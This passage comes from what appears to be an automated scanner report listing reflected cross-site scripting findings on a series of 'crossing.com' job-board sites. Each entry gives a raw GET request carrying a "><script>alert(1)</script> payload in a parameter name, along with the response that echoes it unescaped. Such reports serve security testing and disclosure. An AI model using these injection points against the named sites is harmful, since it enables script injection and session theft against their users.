User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qagf6dbtbo4lqfkvatbk0434m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103836

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.employmentcrossing.com/?c9d32"><script>alert(1)</script>3c4df51b6d0=1">
...[SNIP]...

3.58. http://www.energycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8299"><script>alert(1)</script>be9f4647928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d8299"><script>alert(1)</script>be9f4647928=1 HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=noidta3npdj58s0aohjj586je3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117890

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.energycrossing.com/?d8299"><script>alert(1)</script>be9f4647928=1">
...[SNIP]...

3.59. http://www.engineeringcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce7e"><script>alert(1)</script>f51101cb458 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ce7e"><script>alert(1)</script>f51101cb458=1 HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aut4ejh39idf5up0qhelu1l544; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136570

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.engineeringcrossing.com/?2ce7e"><script>alert(1)</script>f51101cb458=1">
...[SNIP]...

3.60. http://www.entrylevelcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1390"><script>alert(1)</script>3782757edeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a1390"><script>alert(1)</script>3782757edeb=1 HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rvmtdhrtapom8nr77l4ajo2407; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149274

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.entrylevelcrossing.com/?a1390"><script>alert(1)</script>3782757edeb=1">
...[SNIP]...

3.61. http://www.environmentalcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47df8"><script>alert(1)</script>9bba834dd35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?47df8"><script>alert(1)</script>9bba834dd35=1 HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:14 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q47km4obkvavliijoe7tgvqa65; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103948

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalcrossing.com/?47df8"><script>alert(1)</script>9bba834dd35=1">
...[SNIP]...

3.62. http://www.environmentalsafetyhealthcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccd0"><script>alert(1)</script>232068dd834 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ccd0"><script>alert(1)</script>232068dd834=1 HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0erqag1b3vhfvubgk4socfl113; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109501

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.environmentalsafetyhealthcrossing.com/?9ccd0"><script>alert(1)</script>232068dd834=1">
...[SNIP]...

3.63. http://www.erpcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8ac"><script>alert(1)</script>39847d1dfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9c8ac"><script>alert(1)</script>39847d1dfd=1 HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=s019do29bsalhop53kerknqic5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:23 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115915

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.erpcrossing.com/?9c8ac"><script>alert(1)</script>39847d1dfd=1">
...[SNIP]...

3.64. http://www.execcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b15"><script>alert(1)</script>6a4f6925f22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?58b15"><script>alert(1)</script>6a4f6925f22=1 HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9pmt5q5vtv14ne77hequloic12; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130398

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.execcrossing.com/?58b15"><script>alert(1)</script>6a4f6925f22=1">
...[SNIP]...

3.65. http://www.facilitiescrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30174"><script>alert(1)</script>f3d7d566073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30174"><script>alert(1)</script>f3d7d566073=1 HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9tjnfteftbcltcfl79d8lkupi5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.facilitiescrossing.com/?30174"><script>alert(1)</script>f3d7d566073=1">
...[SNIP]...

3.66. http://www.financialservicescrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c380"><script>alert(1)</script>e02d8294ca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8c380"><script>alert(1)</script>e02d8294ca2=1 HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:00 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mka5rd1b1uorq9h0i3qmfjjpj1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:00 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117803

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.financialservicescrossing.com/?8c380"><script>alert(1)</script>e02d8294ca2=1">
...[SNIP]...

3.67. http://www.foodservicescrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298f0"><script>alert(1)</script>ffeb2e14da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?298f0"><script>alert(1)</script>ffeb2e14da1=1 HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:01 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e48qt9e609488dmqmu8f8i5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109901

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.foodservicescrossing.com/?298f0"><script>alert(1)</script>ffeb2e14da1=1">
...[SNIP]...

3.68. http://www.fundraisingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28102"><script>alert(1)</script>aa78d4ce328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?28102"><script>alert(1)</script>aa78d4ce328=1 HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:29 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nm20dvfkbsbjk7ge1970hpse21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 98025

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.fundraisingcrossing.com/?28102"><script>alert(1)</script>aa78d4ce328=1">
...[SNIP]...

3.69. http://www.giscrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bc72"><script>alert(1)</script>c4813ec5858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6bc72"><script>alert(1)</script>c4813ec5858=1 HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rir4ndkuk4qrb18g4imjg1qgc0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.giscrossing.com/?6bc72"><script>alert(1)</script>c4813ec5858=1">
...[SNIP]...

3.70. http://www.governmentcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b65"><script>alert(1)</script>8b14ad25588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

